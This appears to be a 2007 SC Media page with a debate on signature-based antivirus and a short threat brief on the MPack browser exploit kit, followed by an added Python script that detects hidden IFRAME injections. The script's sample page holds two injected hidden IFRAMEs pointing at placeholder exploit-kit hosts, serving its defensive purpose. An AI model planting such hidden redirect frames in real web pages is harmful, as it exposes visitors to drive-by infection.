Debate | SC Media

Debate

August 7, 2007

FOR, by Steve Orenberg, president, Kaspersky Lab 

The death knell for signature-based anti-virus protection has sounded every year for over a decade. To quote ESG analyst Jon Oltsik, "Saying signature based anti-virus software is dead is like saying airbags made seatbelts obsolete. In fact, airbags simply made seatbelts a part of overall safety..."

Sophisticated malware writers continue to try new avenues to circumvent signature-based anti-virus, precisely because it's doing something right. Signature-based anti-virus is not a panacea. However, engines that incorporate string scanning are a crucial component of every traditional anti-virus product as a first defense in detecting the majority of existing malicious code.

The solution isn't abolition, but consortium with proactive detection technologies and complementary fixes — such as firewall, anti-spam and IPS — in order to collectively address the latest multi-layered threats. Although, with the addition of other security technologies its role has changed, signature-based anti-virus is very much alive and well.


AGAINST, by Amrit Williams, CTO, BigFix

Stand-alone anti-virus is simply not protecting corporate desktops against an increasingly hostile threat-environment. Nothing can disguise the fact that anti-virus tools have become commodity items with little to separate competing vendors.

As endpoint-level features and functions become more generic, it is higher level management and integration characteristics that differentiate anti-virus remedies. Manageability includes the quality and usability of the user interface; ability to deliver anti-virus protection to all vulnerable systems; remediation speed; payload delivery accuracy; and deep visibility into endpoint configurations and status.

Furthermore, it is becoming critical to deliver anti-virus services integrated with other security and system management functions.

As stand-alone anti-virus tools consolidate into integrated endpoint management solutions, they are becoming product features. Consolidating anti-virus into consolidated management solutions is where the industry is going and what customers demand.


THREAT OF THE MONTH:
MPack

What is it?

MPack is a modular PHP framework that helps create JavaScript-driven web browser exploits. MPack is released in various versions that contain multiple exploits targeting browser functionality, ActiveX controls and add-ons.

How does it work?

Potential victims are driven to the MPack site via spammed link enticements, DNS poisoning or website compromise, starting the attack cycle. When a user's computer lands on the site, the PHP code on the index.php page will detect the user's browser, version and OS. The IP address is recorded and the geolocation inferred from the IP address is stored in the database. Then, based on the browser and version installed, a series of exploits are launched to infect the victim with malware.

Should I be worried?

We've seen widespread website alterations in the past few weeks which have been designed to load IFRAME elements onto the main pages of websites that contain an MPack exploit site.

How can I prevent it?

Unfortunately there is no silver bullet to prevent this attack. Keep all of your software updated with the latest patches. Disabling JavaScript and ActiveX controls may prevent the exploits from working. Stripping the User-Agent string in the requests may also be used to defeat the attack fingerprinting.

— Jose Nazario, Arbor Networks
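The "website compromise" step described above relied on injecting hidden IFRAME elements into legitimate pages so that visitors were silently sent to the kit's index.php. The following script is an added example, not code from SC Media or Arbor Networks, showing how a site owner can audit their own HTML for that kind of injection: it flags IFRAMEs that are sized to zero, hidden via CSS, or pushed off-screen, and reports where they point. The sample page and the `.invalid` host names it contains are constructed for the demonstration.

```python
"""Audit HTML for hidden IFRAME injections of the kind used to redirect
visitors to exploit-kit landing pages.

Added example (not from SC Media or Arbor Networks). The SAMPLE_PAGE and
the kit.invalid / kit2.invalid host names are constructed for the demo.
"""
from html.parser import HTMLParser
import re

# CSS that makes a frame invisible: display:none, visibility:hidden,
# a zero width/height, or an absolute position far off-screen.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|"
    r"(width|height)\s*:\s*0(px)?(?!\.?\d)|"
    r"(left|top)\s*:\s*-\d{3,}",
    re.I,
)


def _is_zero(value: str) -> bool:
    """True for attribute values such as '0', '00' or '0px'."""
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2].strip()
    return v.isdigit() and int(v) == 0


class IframeAuditor(HTMLParser):
    """Collects every <iframe> that a visitor is not meant to see."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[dict] = []

    # Self-closing <iframe .../> tags are routed here by HTMLParser as well.
    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        for dim in ("width", "height"):
            if dim in a and _is_zero(a[dim]):
                reasons.append(f"{dim}={a[dim]}")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden via style")
        if reasons:
            line, _ = self.getpos()
            self.findings.append(
                {"line": line, "src": a.get("src", ""), "reasons": reasons}
            )


def find_hidden_iframes(html: str) -> list[dict]:
    """Return a list of hidden-IFRAME findings for the given HTML text."""
    parser = IframeAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: one legitimate video embed followed by two injected
# frames that point at a (placeholder) exploit-kit landing page.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://videos.example.org/embed/123" width="640" height="360"></iframe>
<iframe src="http://kit.invalid/index.php" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://kit2.invalid/in.cgi?3" style="display:none"></iframe>
</body></html>"""


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_PAGE):
        print(f"line {f['line']}: hidden iframe -> {f['src']} "
              f"({', '.join(f['reasons'])})")
```

Run against a saved copy of a page (or a crawl of the site) and treat any hit as a reason to compare the file with the deployed source in version control; the visible embed on line 3 of the sample is deliberately left alone, so the check does not simply flag every off-site frame.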
